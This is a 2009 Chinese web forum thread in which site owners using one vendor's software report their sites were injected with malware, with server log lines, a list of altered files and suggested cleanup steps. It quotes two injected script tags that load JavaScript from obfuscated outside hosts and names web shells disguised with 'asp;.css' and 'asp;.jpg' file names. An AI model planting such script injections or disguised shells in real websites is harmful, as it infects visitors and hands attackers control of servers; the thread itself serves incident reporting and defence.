找回密码
 注册会员

扫一扫,访问微社区

QQ登录

只需一步,快速开始

立即体验天翼云服务器(质量靠谱V3.6版本中需要设置的地方汇总点此领幸运券买阿里云优惠多
查看: 5575|回复: 12

[其他信息] 网站被挂马的进来看看.是不是都有这样的情况?

[复制链接]

11

主题

42

回帖

0

积分

限制会员

积分
0
发表于 2009-8-24 22:39:30 | 显示全部楼层 |阅读模式
本帖最后由 chentaonc 于 2009-8-25 12:55 编辑

编辑中!马上上图 晕死不可以上附件~

日志有下列动作:80 POST HTTP/1.1 200 0 171 275 291 0 /css/default.asp;.css - -
80 POST HTTP/1.1 200 0 234 275 319 0 /fckeditor/editor/skins/silver/images/inedx.asp - -
80 POST HTTP/1.1 200 0 218 275 329 0 /fckeditor/editor/dialog/fck_spellerpages/bottum.asp - -
80 POST HTTP/1.1 200 0 187 275 325 0 /fckeditor/editor/plugins/dragresizetable/C00N.asp - -
80 POST HTTP/1.1 200 0 187 275 279 0 /admina/Images/help.asp;.jpg - -
80 GET HTTP/1.1 200 0 156 4274 63 0 /admina/admin_login.asp t=3358 -
80 POST HTTP/1.1 200 0 2421 4671 10841 0 /css/default.asp;.css - -index.asp 被修改
Css/ 文件夹中有个 default.asp;.css

后台 Images/ 文件夹中 help.asp;.jpg

HTML文件中多了 <script id="seraph3script2399" type="text/javascript" src="http://0%3810.6600.org" language="JavaScript"  ></script>
<script language="JavaScript" type="text/javascript" id="seraph4script9195" src="http://c0812%2E2288%2Eorg"  ></script>

后台INC文件夹 Admin.js  js.js 被修改

后台Info/ 文件夹 index.asp被修改

/Templates/文件夹 全部html修改

/Person/文件夹 index.asp 修改

plus/photo/ 文件夹 html修改

/photo/images/  xingxiangcat.js修改

/Sideline/  index.asp 修改

/Inc/ Keyboard.js 修改

/Js/  全部.js修改

/Member/ index.asp   top.asp修改

/Onlinepay/chinabank/  index.asp

/Onlinepay/ index.asp

/fckeditor/editor/plugins/dragresizetable/ 多了CONN.ASP文件

/fckeditor/editor/skins/silver/images/   多了index.asp 文件

/fckeditor/editor/dialog/fck_spellerpages/  多了 bottum.asp文件

/Count/  stat.js文件

/Company/ index.asp文件

Besthr/  index.asp

Autohtml/ index.asp

Article/ index.asp

其他地方我继续检查~\


暂时解决办法: 修改所有被修改代码!
                   关闭空间除Upfiles 目录的写入权限
                   关闭 Upfiles 目录的执行权限
                   数据库转移到其他地方.不要在WEB同一目录下!
                   修改管理员密码. 修改后台地址


IIS日志要明天才可以生成.明天让管理员看看~~~  哎
回复

使用道具 举报

495

主题

2663

回帖

20万

积分

管理员

积分
207527

社区居民新人进步

发表于 2009-8-24 23:41:00 | 显示全部楼层
你这里列的比较详细,具体解决办法
http://bbs.yjys.net/thread-21338-1-1.html
十一休了整整13天,嘉缘福利好,没办法
回复 支持 反对

使用道具 举报

11

主题

42

回帖

0

积分

限制会员

积分
0
 楼主| 发表于 2009-8-25 00:07:34 | 显示全部楼层
希望出补丁
回复 支持 反对

使用道具 举报

5

主题

9

回帖

0

积分

限制会员

积分
0
发表于 2009-8-25 08:25:55 | 显示全部楼层
昨天和今天连续两天被挂马,流量受很大影响
回复 支持 反对

使用道具 举报

12

主题

127

回帖

651

积分

商业客户-企业

积分
651
发表于 2009-8-25 08:36:38 | 显示全部楼层
怎么回事?我的站也被挂马。和楼主的一样的马!~~
希望出补丁!!!及时解决~~~~~~~
回复 支持 反对

使用道具 举报

4

主题

7

回帖

0

积分

限制会员

积分
0
发表于 2009-8-25 09:41:49 | 显示全部楼层
按照这个一个一个解决吧,哎!
黑客气死我了!
揪住黑客要往死里打!
回复 支持 反对

使用道具 举报

16

主题

76

回帖

327

积分

商业客户

积分
327

社区居民

发表于 2009-8-25 10:06:05 | 显示全部楼层
就是
回复 支持 反对

使用道具 举报

10

主题

16

回帖

191

积分

正式会员

积分
191
发表于 2009-8-25 10:34:49 | 显示全部楼层
我的也被挂了 嘉缘的安全怎么一直做不好啊
回复 支持 反对

使用道具 举报

5

主题

11

回帖

36

积分

商业客户

积分
36
发表于 2009-8-25 12:39:57 | 显示全部楼层
我的也是昨天被挂木马了,
郁闷死啊,,,
怎么都被挂木马了,
回复 支持 反对

使用道具 举报

1

主题

12

回帖

0

积分

限制会员

积分
0
发表于 2009-8-26 22:26:50 | 显示全部楼层
是这样啊,吓死我了,我弄了好几次。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册会员

本版积分规则

QQ|Archiver|手机版|小黑屋|嘉缘软件官网 ( 沪ICP备12042403号-2 )

GMT+8, 2025-4-17 00:34 , Processed in 0.136676 second(s), 23 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表